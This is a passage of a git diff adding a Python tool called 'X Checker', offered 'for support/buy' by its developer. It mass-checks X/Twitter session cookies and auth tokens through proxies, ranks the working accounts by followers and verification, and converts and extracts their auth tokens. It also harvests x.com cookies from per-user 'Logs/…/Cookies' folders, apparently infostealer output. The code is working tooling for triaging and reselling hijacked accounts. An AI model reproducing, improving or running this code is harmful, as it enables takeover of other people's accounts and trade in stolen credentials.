+ + progress_bar = "█" * (total_checked * 40 // len(all_tokens)) + "░" * (40 - total_checked * 40 // len(all_tokens)) + print(f"\r\033[1;36m[{progress_bar}]\033[0m {total_checked}/{len(all_tokens)} | \033[1;32m✓{successful}\033[0m | \033[1;31m✗{failed}\033[0m | \033[1;33m★{verified_count}\033[0m | ETA: {eta_str} ", end='', flush=True) + + monitor_task = asyncio.create_task(monitor_progress()) + + batch_tasks = [] + for batch in batches: + task = process_batch_tokens(batch, proxies, output_dir, semaphore, config['cookies_only_mode'], results, user_data_list) + batch_tasks.append(task) + + await asyncio.gather(*batch_tasks) + await monitor_task + + successful = sum(1 for s, v in results if s) + failed = sum(1 for s, v in results if not s) + verified_count = sum(1 for s, v in results if s and v) + + print() + print() + + end_time = datetime.now() + elapsed_time = end_time - start_time + elapsed_seconds = elapsed_time.total_seconds() + + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m SUMMARY\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print(f"\033[1;37mTotal accounts:\033[0m {len(all_tokens)}") + print(f"\033[1;32m✓ Successful:\033[0m {successful}") + print(f"\033[1;31m✗ Failed:\033[0m {failed}") + print(f"\033[1;33m★ Verified:\033[0m {verified_count}") + print(f"\033[1;35m⏱ Time elapsed:\033[0m {elapsed_seconds:.2f}s") + print(f"\033[1;34m📁 Results saved to:\033[0m {output_dir.absolute()}/") + print("\033[1;36m" + "=" * 70 + "\033[0m") + + summary_file = output_dir / f"summary_{datetime.now().strftime('%Y%m%d_%H%M%S')}.txt" + summary_lines = [ + "=" * 80, + "X Checker, contact @CrystalStud for support", + "=" * 80, + f"Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}", + "", + "Results:", + f" Total accounts checked: {len(all_tokens)}", + f" Valid accounts: {successful}", + f" Invalid accounts: {failed}", + f" Verified accounts: {verified_count}", + "", + "Performance:", + f" Time elapsed: {elapsed_seconds:.2f}s", + f" Average per 
account: {elapsed_seconds/len(all_tokens):.2f}s", + "", + "Configuration:", + f" Proxies loaded: {len(proxies) if proxies else 0}", + f" Token files: {len(token_files)}", + f" Total tokens: {len(all_tokens)}", + "", + "=" * 80, + ] + summary_file.write_text('\n'.join(summary_lines), encoding='utf-8') + print_success(f"Summary saved to: {summary_file.name}") + + try: + session_file = Path("temp_session.tw_session") + if session_file.exists(): + session_file.unlink() + except: + pass + + except FileNotFoundError as e: + print_error(f"Error: {e}") + except Exception as e: + print_error(f"Unexpected error: {e}") + + +async def filter_accounts(): + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ FILTER ACCOUNTS │") + print("└─────────────────────────────────────┘\033[0m\n") + + print_info("Enter filter criteria (leave empty to skip):") + print() + + min_followers = get_input("Minimum followers", str(config.get('filter_min_followers', 0))) + max_followers = get_input("Maximum followers (0 = unlimited)", str(config.get('filter_max_followers', 0))) + min_posts = get_input("Minimum posts", str(config.get('filter_min_posts', 0))) + min_likes = get_input("Minimum likes", str(config.get('filter_min_likes', 0))) + verified_only = get_input("Verified only? 
(y/n)", "n").lower() == "y" + + try: + min_followers = int(min_followers) + max_followers = int(max_followers) + min_posts = int(min_posts) + min_likes = int(min_likes) + except: + print_error("Invalid numeric input") + return + + config['filter_min_followers'] = min_followers + config['filter_max_followers'] = max_followers + config['filter_min_posts'] = min_posts + config['filter_min_likes'] = min_likes + config['filter_verified_only'] = verified_only + save_config(config) + + results_dir = Path(config['output_dir']) + if not results_dir.exists(): + print_error(f"Results directory not found: {results_dir}") + return + + result_files = list(results_dir.glob("*.txt")) + result_files = [f for f in result_files if not f.name.startswith("summary_")] + + if not result_files: + print_error("No account files found in results directory") + return + + print() + print_info(f"Found {len(result_files)} account files") + print() + + filtered_dir = Path(config.get('filtered_output_dir', 'filtered')) + filtered_dir.mkdir(exist_ok=True) + + from format_converter import parse_cookie_string, cookies_dict_to_netscape, cookies_dict_to_json, extract_auth_token_from_cookies + + filtered_count = 0 + save_format = config.get('save_format', 'auth_token') + + for result_file in result_files: + try: + content = result_file.read_text(encoding='utf-8') + lines = content.split('\n') + + followers = 0 + posts = 0 + likes = 0 + verified = False + username = "" + + for line in lines: + if line.startswith("Followers:"): + parts = line.split('|') + followers_part = parts[0].replace("Followers:", "").strip().replace(",", "") + try: + followers = int(followers_part) + except: + pass + elif line.startswith("Tweets:"): + parts = line.split('|') + posts_part = parts[0].replace("Tweets:", "").strip().replace(",", "") + likes_part = parts[1].replace("Likes:", "").strip().replace(",", "") + try: + posts = int(posts_part) + likes = int(likes_part) + except: + pass + elif line.startswith("Verified:"): + 
verified = "Yes" in line + elif line.startswith("Username:"): + username = line.split("@")[-1].strip() + + if followers >= min_followers and posts >= min_posts and likes >= min_likes: + if max_followers == 0 or followers <= max_followers: + if not verified_only or verified: + separator_index = -1 + for i, line in enumerate(lines): + if line.startswith("=" * 80): + separator_index = i + + if separator_index >= 0 and separator_index + 1 < len(lines): + content_data = '\n'.join(lines[separator_index + 1:]).strip() + + if save_format == 'auth_token': + if content_data.startswith('#') or '\t' in content_data: + cookies_dict = {} + for line in content_data.split('\n'): + if line.startswith('#') or not line.strip(): + continue + parts = line.split('\t') + if len(parts) >= 7: + cookies_dict[parts[5]] = parts[6] + auth_token = cookies_dict.get('auth_token', content_data) + elif content_data.startswith('[') or content_data.startswith('{'): + import json + try: + data = json.loads(content_data) + if isinstance(data, list): + cookies_dict = {} + for cookie in data: + if 'name' in cookie and 'value' in cookie: + cookies_dict[cookie['name']] = cookie['value'] + auth_token = cookies_dict.get('auth_token', content_data) + else: + auth_token = content_data + except: + auth_token = content_data + else: + auth_token = content_data + + output_file = filtered_dir / result_file.name + output_file.write_text(auth_token, encoding='utf-8') + elif save_format == 'netscape': + if content_data.startswith('[') or content_data.startswith('{'): + import json + try: + data = json.loads(content_data) + if isinstance(data, list): + cookies_dict = {} + for cookie in data: + if 'name' in cookie and 'value' in cookie: + cookies_dict[cookie['name']] = cookie['value'] + else: + cookies_dict = data + netscape_content = cookies_dict_to_netscape(cookies_dict) + output_file = filtered_dir / result_file.name + output_file.write_text(netscape_content, encoding='utf-8') + except: + output_file = filtered_dir / 
result_file.name + output_file.write_text(content_data, encoding='utf-8') + else: + output_file = filtered_dir / result_file.name + output_file.write_text(content_data, encoding='utf-8') + elif save_format == 'json': + if content_data.startswith('#') or '\t' in content_data: + cookies_dict = {} + for line in content_data.split('\n'): + if line.startswith('#') or not line.strip(): + continue + parts = line.split('\t') + if len(parts) >= 7: + cookies_dict[parts[5]] = parts[6] + json_content = cookies_dict_to_json(cookies_dict) + output_file = filtered_dir / result_file.name + output_file.write_text(json_content, encoding='utf-8') + else: + output_file = filtered_dir / result_file.name + output_file.write_text(content_data, encoding='utf-8') + + filtered_count += 1 + except Exception as e: + continue + + print() + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m FILTER RESULTS\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print(f"\033[1;37mTotal accounts scanned:\033[0m {len(result_files)}") + print(f"\033[1;32m✓ Accounts matching criteria:\033[0m {filtered_count}") + print(f"\033[1;34m📁 Filtered results saved to:\033[0m {filtered_dir.absolute()}/") + print(f"\033[1;35m💾 Save format:\033[0m {save_format}") + print("\033[1;36m" + "=" * 70 + "\033[0m") + + +async def extract_tokens(): + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ EXTRACT AUTH TOKENS │") + print("└─────────────────────────────────────┘\033[0m\n") + + results_dir = Path(config['output_dir']) + if not results_dir.exists(): + print_error(f"Results directory not found: {results_dir}") + return + + result_files = list(results_dir.glob("*.txt")) + result_files = [f for f in result_files if not f.name.startswith("summary_")] + + if not result_files: + print_error("No account files found in results directory") + return + + print_info(f"Found {len(result_files)} account files") + print() + + output_file = get_input("Enter output filename", 
"auth_tokens.txt") + output_path = Path(output_file) + + from format_converter import parse_cookie_string, extract_auth_token_from_cookies + import json + + tokens = [] + extracted_count = 0 + + for result_file in result_files: + try: + content = result_file.read_text(encoding='utf-8') + lines = content.split('\n') + + separator_index = -1 + for i, line in enumerate(lines): + if line.startswith("=" * 80): + separator_index = i + + if separator_index >= 0 and separator_index + 1 < len(lines): + content_data = '\n'.join(lines[separator_index + 1:]).strip() + + auth_token = None + + if content_data.startswith('#') or '\t' in content_data: + cookies_dict = {} + for line in content_data.split('\n'): + if line.startswith('#') or not line.strip(): + continue + parts = line.split('\t') + if len(parts) >= 7: + cookies_dict[parts[5]] = parts[6] + auth_token = cookies_dict.get('auth_token') + elif content_data.startswith('[') or content_data.startswith('{'): + try: + data = json.loads(content_data) + if isinstance(data, list): + cookies_dict = {} + for cookie in data: + if 'name' in cookie and 'value' in cookie: + cookies_dict[cookie['name']] = cookie['value'] + auth_token = cookies_dict.get('auth_token') + else: + auth_token = data.get('auth_token') + except: + pass + else: + if 'auth_token=' in content_data or len(content_data) > 30: + if '; ' in content_data: + cookies_dict = parse_cookie_string(content_data) + auth_token = cookies_dict.get('auth_token') + else: + auth_token = content_data.strip() + + if auth_token: + tokens.append(auth_token) + extracted_count += 1 + except Exception as e: + continue + + if tokens: + output_path.write_text('\n'.join(tokens), encoding='utf-8') + print() + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m EXTRACTION RESULTS\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print(f"\033[1;37mTotal files scanned:\033[0m {len(result_files)}") + print(f"\033[1;32m✓ Tokens extracted:\033[0m {extracted_count}") + 
print(f"\033[1;34m📁 Saved to:\033[0m {output_path.absolute()}") + print("\033[1;36m" + "=" * 70 + "\033[0m") + else: + print_error("No auth tokens found in result files") + + +async def convert_cookies(): + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ CONVERT COOKIE FORMAT │") + print("└─────────────────────────────────────┘\033[0m\n") + + print("\033[1;33mSelect conversion:\033[0m") + print(" 1. Netscape → JSON") + print(" 2. JSON → Netscape") + print() + + conversion_choice = get_input("Enter choice (1/2)") + + if conversion_choice not in ["1", "2"]: + print_error("Invalid choice") + return + + input_path = get_input("Enter input file/directory path") + input_location = Path(input_path).expanduser().resolve() + + if not input_location.exists(): + input_location = Path.cwd() / input_path + if not input_location.exists(): + print_error(f"Path not found: {input_path}") + return + + output_dir = get_input("Enter output directory", "converted") + output_path = Path(output_dir) + output_path.mkdir(exist_ok=True) + + from cookie_parser import netscape_to_dict, json_to_dict, clean_cookie_content + from format_converter import cookies_dict_to_netscape, cookies_dict_to_json + import json + + files_to_convert = [] + if input_location.is_file(): + files_to_convert = [input_location] + else: + files_to_convert = list(input_location.glob('*.txt')) + list(input_location.glob('*.json')) + + if not files_to_convert: + print_error("No files found to convert") + return + + print() + print_info(f"Found {len(files_to_convert)} file(s) to convert") + print() + + converted_count = 0 + + for file_path in files_to_convert: + try: + content = file_path.read_text(encoding='utf-8') + cleaned_content = clean_cookie_content(content) + + cookies_dict = None + + if conversion_choice == "1": + try: + cookies_dict = netscape_to_dict(cleaned_content) + if cookies_dict: + json_content = cookies_dict_to_json(cookies_dict) + output_file = output_path / 
f"{file_path.stem}.json" + output_file.write_text(json_content, encoding='utf-8') + converted_count += 1 + except Exception as e: + continue + else: + try: + cookies_dict = json_to_dict(cleaned_content) + if cookies_dict: + netscape_content = cookies_dict_to_netscape(cookies_dict) + output_file = output_path / f"{file_path.stem}.txt" + output_file.write_text(netscape_content, encoding='utf-8') + converted_count += 1 + except Exception as e: + continue + except Exception as e: + continue + + print() + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m CONVERSION RESULTS\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print(f"\033[1;37mTotal files scanned:\033[0m {len(files_to_convert)}") + print(f"\033[1;32m✓ Files converted:\033[0m {converted_count}") + print(f"\033[1;34m📁 Saved to:\033[0m {output_path.absolute()}/") + if conversion_choice == "1": + print(f"\033[1;35m📝 Format:\033[0m Netscape → JSON") + else: + print(f"\033[1;35m📝 Format:\033[0m JSON → Netscape") + print("\033[1;36m" + "=" * 70 + "\033[0m") + + +async def extract_xcom_cookies_from_logs(): + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ EXTRACT X.COM COOKIES FROM LOGS │") + print("└─────────────────────────────────────┘\033[0m\n") + + logs_path = get_input("Enter logs directory path", "Logs") + logs_dir = Path(logs_path).expanduser().resolve() + + if not logs_dir.exists(): + logs_dir = Path.cwd() / logs_path + if not logs_dir.exists(): + print_error(f"Logs directory not found: {logs_path}") + return + + if not logs_dir.is_dir(): + print_error(f"Path is not a directory: {logs_path}") + return + + output_dir = get_input("Enter output directory", "extracted_xcom_cookies") + output_path = Path(output_dir) + output_path.mkdir(exist_ok=True) + + print() + print_info(f"Scanning logs directory: {logs_dir}") + print() + + extracted_count = 0 + scanned_files = 0 + + for user_folder in logs_dir.iterdir(): + if not user_folder.is_dir(): + continue + 
+ cookies_folder = user_folder / "Cookies" + if not cookies_folder.exists() or not cookies_folder.is_dir(): + continue + + for cookie_file in cookies_folder.iterdir(): + if not cookie_file.is_file(): + continue + + if cookie_file.suffix not in ['.txt', '.log', '']: + continue + + try: + scanned_files += 1 + content = cookie_file.read_text(encoding='utf-8', errors='ignore') + lines = content.split('\n') + + all_cookies = [] + + for line in lines: + line = line.strip() + if not line or line.startswith('#'): + continue + + parts = line.split('\t') + if len(parts) >= 7: + domain = parts[0] + if '.x.com' in domain or 'x.com' == domain or '.twitter.com' in domain or 'twitter.com' == domain: + parts[0] = parts[0].replace('.twitter.com', '.x.com') + if parts[0] == 'twitter.com': + parts[0] = 'x.com' + converted_line = '\t'.join(parts) + all_cookies.append(converted_line) + + if all_cookies: + username = user_folder.name + + safe_username = "".join(c if c.isalnum() or c in ('-', '_') else '_' for c in username) + + output_file = output_path / f"{safe_username}.txt" + + cookie_content = '\n'.join(all_cookies) + output_file.write_text(cookie_content, encoding='utf-8') + extracted_count += 1 + break + + except Exception as e: + continue + + print() + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m EXTRACTION RESULTS\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print(f"\033[1;37mFiles scanned:\033[0m {scanned_files}") + print(f"\033[1;32m✓ Accounts with X.com cookies:\033[0m {extracted_count}") + print(f"\033[1;34m📁 Saved to:\033[0m {output_path.absolute()}/") + print("\033[1;36m" + "=" * 70 + "\033[0m") + + +async def main(): + while True: + print_banner() + print_menu() + + choice = get_input("Select option") + + if choice == "1": + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ CHECK ACCOUNTS │") + print("└─────────────────────────────────────┘\033[0m\n") + + print(f"\033[1;33mCurrent Auth Mode:\033[0m 
\033[1;36m{config['auth_mode']}\033[0m\n") + + if config['auth_mode'] == 'cookies': + cookies_path = get_input("Enter cookies directory/file path", config['cookies_dir']) + use_proxy = get_input("Use proxies? (y/n)", "y" if config['use_proxy'] else "n").lower() + + proxy_file = None + if use_proxy == "y": + proxy_file = get_input("Enter proxy file path", "proxies.txt") + + print() + await run_checker(cookies_path, proxy_file) + else: + tokens_path = get_input("Enter auth tokens directory/file path", config.get('tokens_dir', 'tokens')) + use_proxy = get_input("Use proxies? (y/n)", "y" if config['use_proxy'] else "n").lower() + + proxy_file = None + if use_proxy == "y": + proxy_file = get_input("Enter proxy file path", "proxies.txt") + + print() + await run_checker_tokens(tokens_path, proxy_file) + + input("\n\n\033[1;37mPress Enter to continue...\033[0m") + + elif choice == "2": + await filter_accounts() + input("\n\n\033[1;37mPress Enter to continue...\033[0m") + + elif choice == "3": + await extract_tokens() + input("\n\n\033[1;37mPress Enter to continue...\033[0m") + + elif choice == "4": + await convert_cookies() + input("\n\n\033[1;37mPress Enter to continue...\033[0m") + + elif choice == "5": + await extract_xcom_cookies_from_logs() + input("\n\n\033[1;37mPress Enter to continue...\033[0m") + + elif choice == "6": + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ SETTINGS │") + print("└─────────────────────────────────────┘\033[0m\n") + print("\033[1;33mCurrent Settings:\033[0m") + print(f" 1. Cookies directory: \033[1;36m{config['cookies_dir']}\033[0m") + print(f" 2. Output directory: \033[1;36m{config['output_dir']}\033[0m") + print(f" 3. Cookies only mode: \033[1;36m{'Enabled' if config['cookies_only_mode'] else 'Disabled'}\033[0m") + print(f" 4. Threads: \033[1;36m{config['threads']}\033[0m") + print(f" 5. Use proxy by default: \033[1;36m{'Yes' if config['use_proxy'] else 'No'}\033[0m") + print(f" 6. 
Auth mode: \033[1;36m{config['auth_mode']}\033[0m") + print(f" 7. Save format: \033[1;36m{config.get('save_format', 'auth_token')}\033[0m") + print(f"\n 0. Back to main menu") + print() + + setting_choice = get_input("Select setting to change") + + if setting_choice == "1": + new_dir = get_input("Enter cookies directory", config['cookies_dir']) + config['cookies_dir'] = new_dir + save_config(config) + print_success(f"Cookies directory set to: {new_dir}") + await asyncio.sleep(1) + elif setting_choice == "2": + new_dir = get_input("Enter output directory", config['output_dir']) + config['output_dir'] = new_dir + save_config(config) + print_success(f"Output directory set to: {new_dir}") + await asyncio.sleep(1) + elif setting_choice == "3": + toggle = get_input("Enable cookies only mode? (y/n)", "n").lower() + config['cookies_only_mode'] = toggle == "y" + save_config(config) + print_success(f"Cookies only mode: {'Enabled' if config['cookies_only_mode'] else 'Disabled'}") + await asyncio.sleep(1) + elif setting_choice == "4": + new_threads = get_input("Enter number of threads (1-10)", str(config['threads'])) + try: + num = int(new_threads) + if 1 <= num <= 10: + config['threads'] = num + save_config(config) + print_success(f"Threads set to: {num}") + else: + print_error("Value must be between 1 and 10") + except: + print_error("Invalid number") + await asyncio.sleep(1) + elif setting_choice == "5": + toggle = get_input("Use proxy by default? (y/n)", "y" if config['use_proxy'] else "n").lower() + config['use_proxy'] = toggle == "y" + save_config(config) + print_success(f"Use proxy by default: {'Yes' if config['use_proxy'] else 'No'}") + await asyncio.sleep(1) + elif setting_choice == "6": + print("\n\033[1;33mSelect authentication mode:\033[0m") + print(" 1. Cookies (Netscape/JSON format)") + print(" 2. 
Auth Tokens (one per line in .txt)") + mode_choice = get_input("Enter choice (1/2)") + if mode_choice == "1": + config['auth_mode'] = 'cookies' + save_config(config) + print_success("Auth mode set to: cookies") + elif mode_choice == "2": + config['auth_mode'] = 'tokens' + save_config(config) + print_success("Auth mode set to: tokens") + else: + print_error("Invalid choice") + await asyncio.sleep(1) + elif setting_choice == "7": + print("\n\033[1;33mSelect save format:\033[0m") + print(" 1. Auth Token only") + print(" 2. Netscape format") + print(" 3. JSON format") + format_choice = get_input("Enter choice (1/2/3)") + if format_choice == "1": + config['save_format'] = 'auth_token' + save_config(config) + print_success("Save format set to: auth_token") + elif format_choice == "2": + config['save_format'] = 'netscape' + save_config(config) + print_success("Save format set to: netscape") + elif format_choice == "3": + config['save_format'] = 'json' + save_config(config) + print_success("Save format set to: json") + else: + print_error("Invalid choice") + await asyncio.sleep(1) + + elif choice == "7": + print_banner() + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ ABOUT │") + print("└─────────────────────────────────────┘\033[0m\n") + print("\033[1;36mX cookies Checker\033[0m") + print("\033[1;37mDeveloped by: @CrystalStud\033[0m") + print("\n\033[1;33mFeatures:\033[0m") + print(" • Bulk cookie/token validation") + print(" • Extract X.com cookies from logs") + print(" • Account filtering (followers, posts, verified)") + print(" • Auth token extraction") + print(" • Cookie format converter (Netscape ↔ JSON)") + print(" • Multiple save formats (auth_token, netscape, json)") + print(" • Proxy support (SOCKS5/HTTP)") + print(" • Multi-threaded processing") + print(" • Detailed reporting") + print("\n\033[1;35mContact: @CrystalStud for support/buy\033[0m") + input("\n\n\033[1;37mPress Enter to continue...\033[0m") + + elif choice == "0": + 
print_banner() + print("\n\033[1;35mThank you for using X Checker!\033[0m") + print("\033[1;36mDM @CrystalStud for support\033[0m\n") + sys.exit(0) + else: + print_error("Invalid option. Please try again.") + await asyncio.sleep(1) + + +if __name__ == "__main__": + asyncio.run(main()) diff --git a/proxy_handler.py b/proxy_handler.py new file mode 100644 index 0000000..e35c991 --- /dev/null +++ b/proxy_handler.py @@ -0,0 +1,66 @@ +from pathlib import Path +from typing import List +from tweety.types import Proxy, PROXY_TYPE_SOCKS5, PROXY_TYPE_HTTP + + +def read_proxy_file(file_path: str) -> List[Proxy]: + path = Path(file_path) + if not path.exists(): + raise FileNotFoundError(f"Proxy file not found: {file_path}") + + proxies = [] + lines = path.read_text(encoding='utf-8').strip().split('\n') + + for line in lines: + line = line.strip() + if not line or line.startswith('#'): + continue + + try: + if '://' in line: + protocol, rest = line.split('://', 1) + else: + protocol = 'socks5' + rest = line + + username = None + password = None + + if '@' in rest: + auth, host_port = rest.rsplit('@', 1) + if ':' in auth: + username, password = auth.split(':', 1) + else: + host_port = rest + + if ':' in host_port: + host, port = host_port.rsplit(':', 1) + port = int(port) + else: + continue + + protocol = protocol.lower() + if protocol in ['socks5', 'socks', 'socks5h']: + proxy_type = PROXY_TYPE_SOCKS5 + elif protocol in ['http', 'https']: + proxy_type = PROXY_TYPE_HTTP + else: + continue + + proxy = Proxy( + host=host, + port=port, + proxy_type=proxy_type, + username=username, + password=password + ) + + proxies.append(proxy) + + except Exception: + continue + + if proxies: + print(f"✓ Loaded {len(proxies)} proxies from file") + + return proxies diff --git a/test_single_cookie.py b/test_single_cookie.py new file mode 100644 index 0000000..8287fad --- /dev/null +++ b/test_single_cookie.py @@ -0,0 +1,118 @@ +#!/usr/bin/env python3 +""" +Quick test script to debug a single cookie 
file +Usage: python3 test_single_cookie.py +""" + +import sys +from pathlib import Path +from cookie_parser import read_cookies_file, clean_cookie_content, netscape_to_dict, json_to_dict +import json +import debug_logger as log + +def test_cookie_file(file_path): + log.info(f"Testing cookie file: {file_path}") + log.info("=" * 80) + + path = Path(file_path) + if not path.exists(): + log.error(f"File not found: {file_path}") + return False + + # Read raw content + print("\n1. Reading file...") + try: + raw_content = path.read_text(encoding='utf-8') + log.info(f"✓ File read successfully, size: {len(raw_content)} bytes") + print(f"First 500 characters:") + print("-" * 80) + print(raw_content[:500]) + print("-" * 80) + except Exception as e: + log.error(f"✗ Failed to read file: {e}") + return False + + # Clean content + print("\n2. Cleaning content...") + try: + cleaned = clean_cookie_content(raw_content) + log.info(f"✓ Content cleaned, size: {len(cleaned)} bytes") + print(f"Cleaned content (first 500 chars):") + print("-" * 80) + print(cleaned[:500]) + print("-" * 80) + except Exception as e: + log.error(f"✗ Failed to clean content: {e}") + return False + + # Try to parse + print("\n3. Attempting to parse...") + cookies_dict = None + + # Try JSON first + try: + cookies_dict = json_to_dict(cleaned) + log.info(f"✓ Parsed as JSON format") + print(f"Cookies found: {len(cookies_dict)}") + print(f"Cookie names: {list(cookies_dict.keys())}") + except json.JSONDecodeError as e: + log.debug(f"Not JSON: {e}") + + # Try Netscape + try: + cookies_dict = netscape_to_dict(cleaned) + log.info(f"✓ Parsed as Netscape format") + print(f"Cookies found: {len(cookies_dict)}") + print(f"Cookie names: {list(cookies_dict.keys())}") + except Exception as e: + log.error(f"✗ Failed to parse as Netscape: {e}") + return False + + # Check for required cookies + print("\n4. 
Checking for required cookies...") + required_cookies = ['auth_token', 'ct0'] + for cookie_name in required_cookies: + if cookie_name in cookies_dict: + value = cookies_dict[cookie_name] + print(f"✓ {cookie_name}: {value[:30]}..." if len(value) > 30 else f"✓ {cookie_name}: {value}") + else: + print(f"✗ {cookie_name}: NOT FOUND") + + # Test full read_cookies_file function + print("\n5. Testing read_cookies_file function...") + try: + cookie_string = read_cookies_file(str(file_path)) + if cookie_string: + log.info(f"✓ read_cookies_file successful") + print(f"Cookie string length: {len(cookie_string)}") + print(f"Cookie string preview (first 200 chars):") + print(cookie_string[:200]) + else: + log.error(f"✗ read_cookies_file returned None") + return False + except Exception as e: + log.error(f"✗ read_cookies_file failed: {e}") + log.exception("Exception:") + return False + + log.info("=" * 80) + log.info("✓ All tests passed!") + return True + +if __name__ == "__main__": + if len(sys.argv) < 2: + # Test first file in cookies directory + cookies_dir = Path("cookies") + if cookies_dir.exists(): + cookie_files = list(cookies_dir.glob("*.txt")) + list(cookies_dir.glob("*.json")) + if cookie_files: + test_file = cookie_files[0] + print(f"No file specified, testing first file: {test_file}") + test_cookie_file(test_file) + else: + print("No cookie files found in cookies/ directory") + else: + print("Usage: python3 test_single_cookie.py ") + print("Or place cookie files in cookies/ directory") + else: + test_cookie_file(sys.argv[1]) diff --git a/twitter_auth_cookies.py b/twitter_auth_cookies.py new file mode 100644 index 0000000..a459c15 --- /dev/null +++ b/twitter_auth_cookies.py @@ -0,0 +1,608 @@ +#!/usr/bin/env python3 +""" +Twitter Authentication Script using Cookies +Supports Netscape and JSON cookie formats +""" + +import json +import sys +import asyncio +import random +import shutil +from pathlib import Path +from typing import Dict, Union, Optional, List +from datetime 
from datetime import datetime  # NOTE(review): completes the `from datetime` statement cut at the chunk boundary
from tweety import TwitterAsync
from tweety.types import Proxy, PROXY_TYPE_SOCKS5, PROXY_TYPE_HTTP


def clean_cookie_content(content: str) -> str:
    """Strip non-cookie noise from raw cookie-file content.

    JSON payloads are truncated at the end of the first balanced top-level
    array/object; Netscape payloads keep only '#' comment lines and lines
    that look like valid 7-field tab-separated cookie records.

    Args:
        content: Raw file content.

    Returns:
        Cleaned content, or the original content unchanged when nothing
        recognizable was found.
    """
    stripped = content.strip()

    # JSON input: scan for the close of the first balanced top-level [] or {}.
    if stripped[:1] in ('[', '{'):
        opener = stripped[0]
        closer = ']' if opener == '[' else '}'
        depth = 0
        for i, char in enumerate(stripped):
            if char == opener:
                depth += 1
            elif char == closer:
                depth -= 1
                if depth == 0:
                    # Drop any trailing junk after the JSON document.
                    return stripped[:i + 1]
        # Unbalanced brackets: fall through to line-based cleaning.

    # Netscape input; field layout: domain flag path secure expiration name value.
    kept = []
    for raw_line in stripped.split('\n'):
        line = raw_line.strip()
        if not line:
            continue
        if line.startswith('#'):
            # Header comments are part of the Netscape format -- keep them.
            kept.append(line)
            continue
        fields = line.split('\t')
        if len(fields) >= 7:
            try:
                int(fields[4])  # expiration must be numeric for a real cookie
            except ValueError:
                continue  # not a cookie line, skip it
            kept.append(line)

    return '\n'.join(kept) if kept else content


def netscape_to_dict(netscape_content: str) -> Dict[str, str]:
    """Parse Netscape-format cookies into a name -> value mapping.

    Args:
        netscape_content: Netscape format cookies as a string.

    Returns:
        Dictionary of cookie name-value pairs.
    """
    cookies: Dict[str, str] = {}
    for line in netscape_content.strip().split('\n'):
        # Skip comments and blank lines.
        if line.startswith('#') or not line.strip():
            continue
        # Field layout: domain flag path secure expiration name value
        fields = line.split('\t')
        if len(fields) >= 7:
            cookies[fields[5]] = fields[6]
    return cookies


def json_to_dict(json_content: str) -> Dict[str, str]:
    """Parse JSON-format cookies into a name -> value mapping.

    Supports both a list of {"name": ..., "value": ...} objects and a plain
    {"cookie_name": "cookie_value", ...} mapping.

    Args:
        json_content: JSON format cookies as a string.

    Returns:
        Dictionary of cookie name-value pairs.

    Raises:
        json.JSONDecodeError: If the content is not valid JSON.
    """
    data = json.loads(json_content)
    if isinstance(data, list):
        # Browser-export format: list of cookie objects.
        return {c['name']: c['value'] for c in data if 'name' in c and 'value' in c}
    if isinstance(data, dict):
        return data
    return {}


def dict_to_cookie_string(cookies: Dict[str, str]) -> str:
    """Render a cookie mapping as a "name1=value1; name2=value2" string for tweety."""
    return "; ".join(f"{name}={value}" for name, value in cookies.items())


def read_proxy_file(file_path: str) -> List[Proxy]:
    """Read all proxies from a file, one per line.

    Line format: protocol://[username:password@]host:port
    Blank lines, '#' comments, and unparsable lines are skipped silently.

    Args:
        file_path: Path to the proxy file.

    Returns:
        List of Proxy objects (possibly empty).

    Raises:
        FileNotFoundError: If the file does not exist.
    """
    path = Path(file_path)
    if not path.exists():
        raise FileNotFoundError(f"Proxy file not found: {file_path}")

    proxies: List[Proxy] = []
    for raw_line in path.read_text(encoding='utf-8').strip().split('\n'):
        line = raw_line.strip()
        if not line or line.startswith('#'):
            continue
        try:
            # Split off the scheme; default to SOCKS5 when absent.
            if '://' in line:
                protocol, rest = line.split('://', 1)
            else:
                protocol, rest = 'socks5', line

            username = None
            password = None
            if '@' in rest:
                # rsplit: passwords may themselves contain '@'.
                auth, host_port = rest.rsplit('@', 1)
                if ':' in auth:
                    username, password = auth.split(':', 1)
            else:
                host_port = rest

            if ':' not in host_port:
                continue  # a port is mandatory
            host, port_str = host_port.rsplit(':', 1)
            port = int(port_str)

            protocol = protocol.lower()
            if protocol in ('socks5', 'socks', 'socks5h'):
                proxy_type = PROXY_TYPE_SOCKS5
            elif protocol in ('http', 'https'):
                proxy_type = PROXY_TYPE_HTTP
            else:
                continue  # unsupported scheme

            proxies.append(Proxy(
                host=host,
                port=port,
                proxy_type=proxy_type,
                username=username,
                password=password,
            ))
        except Exception:
            # Malformed line (e.g. non-numeric port) -- skip it.
            continue

    if proxies:
        print(f"✓ Loaded {len(proxies)} proxies from file")
    return proxies


def read_cookies_file(file_path: str) -> Optional[str]:
    """Read a cookie file (Netscape or JSON) and convert it to tweety format.

    Args:
        file_path: Path to the cookies file.

    Returns:
        Cookie string ready for tweety, or None when the file is missing,
        unreadable, or contains no parsable cookies.
        (Annotation fixed: the original claimed `-> str` but returned None.)
    """
    path = Path(file_path)
    if not path.exists():
        return None
    try:
        content = path.read_text(encoding='utf-8')
    except Exception:
        return None

    # Clean the content first.
    content = clean_cookie_content(content)
    if not content:
        return None

    # Try JSON first; fall back to Netscape on a decode error.
    try:
        cookies_dict = json_to_dict(content)
    except json.JSONDecodeError:
        try:
            cookies_dict = netscape_to_dict(content)
        except Exception:
            return None

    if not cookies_dict:
        return None
    return dict_to_cookie_string(cookies_dict)


